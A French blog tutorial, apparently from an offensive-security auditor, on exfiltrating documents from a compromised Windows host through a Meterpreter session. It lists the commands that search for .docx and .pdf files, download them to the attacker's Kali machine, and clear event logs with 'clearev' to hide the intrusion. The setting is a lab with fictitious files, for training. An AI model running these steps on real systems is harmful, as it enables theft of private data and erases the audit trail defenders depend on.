Exfiltrer des données depuis une session meterpreter (Post Exploitation)
Rappel : L’article qui va suivre contient des techniques et méthodes qui peuvent s’avérer être illégales et dangereuses si elles sont utilisées à mauvais escient. Ce tutoriel ne doit en aucun cas être utilisé contre un particulier, une entreprise, une organisation à but non lucratif ou une administration publique de quelconque pays. Je me dédouane de toute responsabilité en cas de problèmes ou d’incidents de quelque nature que ce soit après le visionnage de cet article.
Bonjour à tous dans ce billet nous allons voir comment exfiltrer des données depuis une machine dont nous avons pris le contrôle en amont. Nous allons utiliser une session meterpreter déjà connectée à une victime disposant d’un système d’exploitation Windows.
nb: Cet article ne vous montreras pas comment prendre le contrôle d’une machine windows.
Table des matières
I. Prérequis
- Une session meterpreter (depuis kalilinux), connectée à une machine Windows (serveur 2019 dans mon cas).
- Vous pouvez aussi utiliser Windows 7, 10, et même pourquoi pas Windows 11 ^^
Imaginez le contexte suivant :
Vous venez de prendre le contrôle d’un ordinateur Windows via l’exploitation d’une faille de sécurité, ou bien en ayant installé un logiciel infecté par un virus. Dès lors vous souhaitez rechercher des documents sensibles qui pourraient appartenir à la victime.
Lors de vos recherches, je vous conseille de vous concentrer sur moins de 10 extensions de fichier (ex : .pdf,.docx,.doc,.xlsx,.pptx etc.). Dans notre cas pour simplifier le didacticiel, nous allons nous concentrer sur les deux extensions de fichiers suivants :
- docx
En guise de test, j’ai créé rapidement des fichiers sur la machine victime avec des noms qui pourrait s’apparenter à des documents confidentiels au sein d’une entreprise.. Ces documents ont été déposés dans un partage SMB, et ils sont bien entendu fictif.
Ensuite, exécutez la commande suivante, qui va rechercher tous les documents dont l’extension est .pdf/.docx depuis la racine du système de fichiers de notre serveur compromis :
search -f *.docx -f *.pdf 
Rapidement, nous trouvons quatre fichiers aux noms évocateurs 🙂
II. Exflitration des données
Bon, nous avons trouvé des données, mais nous ne pouvons pas encore les exploiter de manière concrète. Nous savons simplement que ces fichiers existent. Pour exfiltrer ces données, nous devons nous positionner dans les répertoires en question avec la commande suivante :
cd '<chemin absolut>'Puis éxécutez la commande suivante :
download *Comme vous l’indique la capture d’écran ci-dessous, les fichiers ont été téléchargés avec succès, et sont stockés dans le dossier suivant de ma machine attaquante kali : /home/kali/
Afin d’effacer d’éventuelle traces numérique suite à notre intrusion dans le système, exécutez la commande suivante :
clearev
++
Geoffrey
Geoffrey Sauvageot-Berland
Ingénieur Diplômé par l’Etat en Informatique et Cybersécurité. Généraliste ; à l'origine, administrateur systèmes et réseaux, j’occupe actuellement un poste d’auditeur en sécurité offensive. J’apprécie également la programmation/automatisation. - Fondateur du blog : "Le guide du secops".
